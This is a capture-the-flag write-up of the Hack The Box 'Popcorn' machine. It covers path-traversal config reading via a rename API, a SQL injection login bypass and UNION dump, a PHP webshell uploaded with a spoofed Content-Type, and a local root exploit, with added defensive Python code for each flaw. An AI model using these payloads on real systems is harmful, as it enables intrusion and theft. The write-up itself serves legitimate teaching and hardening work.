🟠 HTB - Popcorn

https://i.ibb.co/b6xZz9t/Popcorn.png


# System Info & Credentials

IP: 10.10.10.6
OS: Ubuntu 9.10 "Karmic Koala"
Hosts: popcorn.htb
Credentials: torrent:SuperSecret!!

# Nmap Result

```console
root@kali:~/HTB/popcorn# nmap -p22,80 -sT 10.10.10.6 --min-rate 10000 -sV -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 13:48 UTC
Nmap scan report for 10.10.10.6 (10.10.10.6)
Host is up (0.057s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds
root@kali:~/HTB/popcorn#
```

# Open Ports & To-Do

| Port | Service | Version | To-Do |
|---|---|---|---|
| 22/tcp | SSH | OpenSSH 5.1p1-6ubuntu2 | Need credentials |
| 80/tcp | HTTP | Apache/2.2.12 | Web enumerate |

# Enumeration Notes

Web-Enum:

https://i.ibb.co/ZG8ngW6/resim-2025-01-23-141548690.png

Directory & Files

```text
/index/
/test/ -> phpinfo() page
/torrent/ -> TorrentHoster
	/torrents.php
	/comment
	/config.php
	/database/th_database.sql -> admin:admin12
	/login
	/upload.php
	/upload -> uploads directory
	/readme
	/lib -> Index of /torrent/lib
/rename/ -> api
```

/torrent/

https://i.ibb.co/YhsKdDw/resim-2025-01-23-142222893.png

# Vulnerabilities

Rename Files

We can rename files with the rename API.

For example, config.php can be read by renaming it to config.txt, which the server then serves as plain text instead of executing it.

```text
/rename/
		Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name
```

```text
/rename/index.php?filename=/var/www/torrent/config.php&newfilename=/var/www/torrent/lib/config.txt
	  $CFG->dbName = "torrenthoster";	//db name
	  $CFG->dbUserName = "torrent";    //db username
	  $CFG->dbPassword = "SuperSecret!!";	//db password
```
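The rename endpoint above accepts arbitrary absolute paths for both arguments, which is why a config file can be moved into a listed directory and renamed to a readable extension. What a fixed endpoint's argument check looks like, as an added example that is not code from the original post or from TorrentHoster: both names are confined to one upload directory and must keep an allow-listed, non-executable extension. `UPLOAD_ROOT`, `ALLOWED_EXTS` and the function names are assumptions for the example.

```python
"""Hardened argument check for a file-rename endpoint.

Added example, not code from the original post or from TorrentHoster. It
assumes renames are only ever legitimate inside one upload directory
(UPLOAD_ROOT) and that both the old and the new name must stay inside it
and keep a non-executable extension.
"""
import posixpath

UPLOAD_ROOT = "/var/www/torrent/upload"          # assumption: the only directory the API may touch
ALLOWED_EXTS = {".torrent", ".jpg", ".jpeg", ".png", ".gif"}  # assumption: what the site stores


class RenameError(ValueError):
    """Raised for any request that must be refused."""


def resolve_inside_root(user_path: str, root: str = UPLOAD_ROOT) -> str:
    """Map a client-supplied relative name to an absolute path under root.

    Rejects NUL bytes, absolute paths and anything that normalises to a
    location outside root (e.g. '../config.php').
    """
    if "\x00" in user_path:
        raise RenameError("NUL byte in path")
    if posixpath.isabs(user_path):
        raise RenameError("absolute paths are not accepted")
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if not candidate.startswith(root + "/"):
        raise RenameError("path escapes the upload root")
    return candidate


def validate_rename(old_name: str, new_name: str, root: str = UPLOAD_ROOT) -> tuple:
    """Return (src, dst) absolute paths if the rename is acceptable, else raise.

    Both names are confined to root and both extensions must be on the
    allow-list, so a stored .php can never become a readable .txt and an
    uploaded .jpg can never become an executable .php.
    """
    src = resolve_inside_root(old_name, root)
    dst = resolve_inside_root(new_name, root)
    for path in (src, dst):
        ext = posixpath.splitext(path)[1].lower()
        if ext not in ALLOWED_EXTS:
            raise RenameError(f"extension {ext!r} not allowed")
    return src, dst


def check(old_name: str, new_name: str) -> str:
    """Describe the decision for a request instead of raising."""
    try:
        src, dst = validate_rename(old_name, new_name)
    except RenameError as exc:
        return f"REJECT {old_name!r} -> {new_name!r}: {exc}"
    return f"ALLOW {src} -> {dst}"


if __name__ == "__main__":
    # The request from the write-up and two variations, all refused:
    print(check("/var/www/torrent/config.php", "/var/www/torrent/lib/config.txt"))
    print(check("../config.php", "../lib/config.txt"))
    print(check("photo.jpg", "photo.php"))
    # An ordinary rename inside the upload directory still works:
    print(check("old.torrent", "new.torrent"))
```

`posixpath` is used instead of `os.path` so the containment check behaves the same on any host; the prefix test is done on the normalised path, after `..` segments have been collapsed, because testing the raw string would be bypassable.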

Authentication Bypass

```text
/torrent/login (Authentication Bypass) -> admin' or 1='1
```

SQL Injection

```text
/torrent/torrents.php (There is sqli on search box) -> test' union select null,group_concat(schema_name),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.schemata-- -
```

File Upload (Authenticated)

https://i.ibb.co/1X73pKn/resim-2025-01-23-142803287.png

# Foothold

SQL Injection

```text
/torrent/torrents.php (There is sqli on search box) -> test' union select null,group_concat(schema_name),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.schemata-- -
database:information_schema
database:torrenthoster
	tables:ban
	tables:categories
	tables:comments
	tables:log
	tables:namemap
	tables:news
	tables:subcategories
	tables:users
		columns:id
		columns:userName
		columns:password
		columns:privilege
		columns:email
		columns:joined
		columns:lastconnect

dumped -> Admin : d5bfedcee289e5e05b86daad8ee3e2e2 : admin : admin@yourdomain.com (couldn't crack this hash)
```
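The login bypass under Vulnerabilities and the search-box injection used for this dump have the same root cause: user input concatenated into SQL text. The following is an added example, not code from the original post or from TorrentHoster, showing the string-built login query next to its parameterised form and a parameterised search, run against an in-memory SQLite table with constructed rows that mimic the dumped `users` table. The MD5 password hashing and the `torrents` table are assumptions made so the comparison mirrors the application.

```python
"""Login and search queries with and without parameter binding.

Added example, not code from the original post or from TorrentHoster. It
uses an in-memory SQLite database with constructed rows that mimic the
torrenthoster.users table dumped above. The password column is assumed to
hold unsalted MD5 (the dumped value is 32 hex characters); that is only
reproduced so the comparison matches the application's behaviour.
"""
import hashlib
import sqlite3

# Constructed sample rows. The Admin hash is the one dumped in the write-up;
# the second row is made up.
SAMPLE_USERS = [
    (1, "Admin", "d5bfedcee289e5e05b86daad8ee3e2e2", "admin", "admin@yourdomain.com"),
    (2, "alice", hashlib.md5(b"correct horse").hexdigest(), "user", "alice@example.invalid"),
]
SAMPLE_TORRENTS = [("ubuntu-9.10-desktop-i386.iso",), ("karmic-notes.torrent",)]


def make_db() -> sqlite3.Connection:
    """Build the throw-away database. COLLATE NOCASE mimics MySQL's
    case-insensitive default collation, so 'admin' matches 'Admin'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, userName TEXT COLLATE NOCASE, "
                 "password TEXT, privilege TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", SAMPLE_USERS)
    conn.execute("CREATE TABLE torrents (name TEXT)")
    conn.executemany("INSERT INTO torrents VALUES (?)", SAMPLE_TORRENTS)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String-built query: the username is interpreted as SQL, so the
    write-up's payload turns the WHERE clause into "name = 'admin' OR ..."."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = (f"SELECT userName, privilege FROM users "
           f"WHERE userName = '{username}' AND password = '{pw_hash}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username: str, password: str):
    """Bound parameters: the username is only ever compared as data."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT userName, privilege FROM users WHERE userName = ? AND password = ?"
    return conn.execute(sql, (username, pw_hash)).fetchone()


def search_safe(conn, term: str) -> list:
    """Search box done safely: bind the pattern and escape LIKE wildcards,
    so neither quotes nor %/_ in the input change the query."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT name FROM torrents WHERE name LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, (f"%{escaped}%",))]


if __name__ == "__main__":
    db = make_db()
    bypass = "admin' or 1='1"          # the login payload from the write-up
    print("vulnerable:", login_vulnerable(db, bypass, "anything"))      # ('Admin', 'admin')
    print("safe:      ", login_safe(db, bypass, "anything"))            # None
    print("search:    ", search_safe(db, "test' union select null--"))  # []
```

Binding parameters fixes both findings at once; the `ESCAPE` clause in the search is the extra step people usually forget, since `%` and `_` in a bound `LIKE` pattern are still wildcards even when quoting is no longer an issue.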

Upload Shell

https://i.ibb.co/1X73pKn/resim-2025-01-23-142803287.png

Request Body:

Changed the Content-Type header of the file part from application/x-php to image/jpeg:

```http
-----------------------------239990188727439809613051752681
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg

<?php system($_GET["cmd"]);?>

-----------------------------239990188727439809613051752681
Content-Disposition: form-data; name="submit"

Submit Screenshot
-----------------------------239990188727439809613051752681--
```

Response Body:

```text
Upload: cmd.php
Type: image/jpeg
Size: 0.029296875 Kb
Upload Completed.
Please refresh to see the new screenshot.
```

The file is stored under a hashed name but keeps its original .php extension, so Apache executes it:

```console
http://popcorn.htb/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) 
```
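The upload handler accepted the file because it trusted the client-supplied Content-Type and kept the client's extension. The following is an added example, not code from the original post or from TorrentHoster, of the server-side checks that would have refused the request above: the declared type is only logged, the extension is allow-listed, the file's own leading bytes must match that extension, and the stored name is generated from the content. The signature table, size cap and function names are assumptions for the example.

```python
"""Server-side checks for an image upload handler.

Added example, not code from the original post or from TorrentHoster. It
assumes the feature only needs to accept screenshots (JPEG/PNG/GIF), as
the "Submit Screenshot" form suggests. The client-supplied Content-Type is
recorded but never trusted; the file's own bytes decide, and the stored
name carries an extension derived from that check, not from the client.
"""
import hashlib
import os
import posixpath

# Leading bytes -> canonical extension (assumption: these formats suffice)
SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
ALLOWED_EXTS = {".jpg", ".jpeg", ".png", ".gif"}
MAX_BYTES = 2 * 1024 * 1024   # assumption: 2 MiB cap for a screenshot


def sniff_extension(data: bytes):
    """Return the extension implied by the leading bytes, or None."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(filename: str, declared_type: str, data: bytes) -> dict:
    """Decide whether to accept one multipart file part.

    Returns {"ok": bool, "reason": str, "stored_as": str | None}. Reasons are
    specific so they can be logged next to the client's declared type.
    """
    if len(data) == 0 or len(data) > MAX_BYTES:
        return {"ok": False, "reason": "empty or oversized", "stored_as": None}
    base = posixpath.basename(filename.replace("\\", "/"))      # drop any client path
    claimed_ext = posixpath.splitext(base)[1].lower()
    if claimed_ext not in ALLOWED_EXTS:
        return {"ok": False, "reason": f"extension {claimed_ext!r} not allowed", "stored_as": None}
    claimed_ext = {".jpeg": ".jpg"}.get(claimed_ext, claimed_ext)
    real_ext = sniff_extension(data)
    if real_ext is None:
        return {"ok": False, "reason": "content is not a recognised image", "stored_as": None}
    if real_ext != claimed_ext:
        return {"ok": False, "reason": f"content is {real_ext} but name says {claimed_ext}",
                "stored_as": None}
    # Name from the content hash plus the sniffed extension, never from the client.
    stored = hashlib.sha1(data).hexdigest() + real_ext
    return {"ok": True, "reason": f"accepted (client declared {declared_type})", "stored_as": stored}


def save_upload(result: dict, data: bytes, upload_dir: str) -> str:
    """Write an accepted file with a fixed non-executable mode; O_EXCL refuses
    to overwrite an existing file of the same content hash."""
    path = os.path.join(upload_dir, result["stored_as"])
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


# Constructed sample parts. WEBSHELL_PART reproduces the request in the write-up.
WEBSHELL_PART = ("cmd.php", "image/jpeg", b'<?php system($_GET["cmd"]);?>')
DISGUISED_PART = ("cmd.jpg", "image/jpeg", b'<?php system($_GET["cmd"]);?>')
JPEG_PART = ("shot.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32)
MISNAMED_PART = ("shot.png", "image/png", JPEG_PART[2])

if __name__ == "__main__":
    for part in (WEBSHELL_PART, DISGUISED_PART, JPEG_PART, MISNAMED_PART):
        print(part[0], "->", validate_upload(*part))
```

These checks are one layer; the upload directory should additionally be configured so the web server never executes anything in it (for mod_php, `php_admin_flag engine off` in that directory's configuration), so that a check bypass still does not yield code execution.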

# Privilege Escalation

Check OS version:

```console
www-data@popcorn:/home/george$ uname -a
uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/*release*
cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=9.10
DISTRIB_CODENAME=karmic
DISTRIB_DESCRIPTION="Ubuntu 9.10"
www-data@popcorn:/home/george$
```

Exploit used: Ubuntu PAM MOTD local root, https://www.exploit-db.com/exploits/14339

```console
www-data@popcorn:/tmp$ ls
privesc.sh  vgauthsvclog.txt.0	vmware-root
www-data@popcorn:/tmp$ ./privesc.sh 
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password: 
root@popcorn:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@popcorn:/tmp#
```
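The exploit output reports `owned: /etc/passwd` and `owned: /etc/shadow`, meaning those files end up owned by the unprivileged account, which is a durable artefact on the host. As an added example, not from the original post or the linked exploit, here is a small baseline check that flags such ownership or mode changes on a few critical files, run over constructed stat records for a clean host and for one after the exploit. The baseline values are the Debian/Ubuntu defaults and are an assumption here.

```python
"""Baseline check for the ownership side effects shown in the exploit output.

Added example, not from the original post or the exploit it links. Compares
owner, group and mode of critical files against a fixed baseline. The
baseline (root:root 0644 for /etc/passwd, root:shadow 0640 for /etc/shadow
with gid 42 for 'shadow', and so on) is the Debian/Ubuntu default and is an
assumption; adjust it for other distributions.
"""
import os
import stat

# path -> (expected uid, expected gid, expected mode)
BASELINE = {
    "/etc/passwd": (0, 0, 0o644),
    "/etc/shadow": (0, 42, 0o640),
    "/etc/group": (0, 0, 0o644),
    "/etc/sudoers": (0, 0, 0o440),
}


def collect(paths):
    """Read (uid, gid, mode) for each path that exists on this host."""
    records = {}
    for p in paths:
        try:
            st = os.stat(p)
        except FileNotFoundError:
            continue
        records[p] = (st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode))
    return records


def audit(records, baseline=BASELINE):
    """Return one finding string per deviation from the baseline."""
    findings = []
    for path, (uid, gid, mode) in baseline.items():
        if path not in records:
            findings.append(f"{path}: missing")
            continue
        got_uid, got_gid, got_mode = records[path]
        if got_uid != uid:
            findings.append(f"{path}: owner uid {got_uid}, expected {uid}")
        if got_gid != gid:
            findings.append(f"{path}: group gid {got_gid}, expected {gid}")
        if got_mode & 0o022:
            findings.append(f"{path}: group/world writable (mode {got_mode:04o})")
        elif got_mode != mode:
            findings.append(f"{path}: mode {got_mode:04o}, expected {mode:04o}")
    return findings


# Constructed records. AFTER_EXPLOIT models what the output above reports:
# /etc/passwd and /etc/shadow now owned by www-data (uid 33).
CLEAN = {
    "/etc/passwd": (0, 0, 0o644),
    "/etc/shadow": (0, 42, 0o640),
    "/etc/group": (0, 0, 0o644),
    "/etc/sudoers": (0, 0, 0o440),
}
AFTER_EXPLOIT = dict(CLEAN, **{
    "/etc/passwd": (33, 0, 0o644),
    "/etc/shadow": (33, 42, 0o640),
})

if __name__ == "__main__":
    print("clean host:   ", audit(CLEAN))
    print("after exploit:", audit(AFTER_EXPLOIT))
    # On a real host, run it against the live files instead:
    print("this host:    ", audit(collect(BASELINE)))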

This post is licensed under CC BY 4.0 by the author.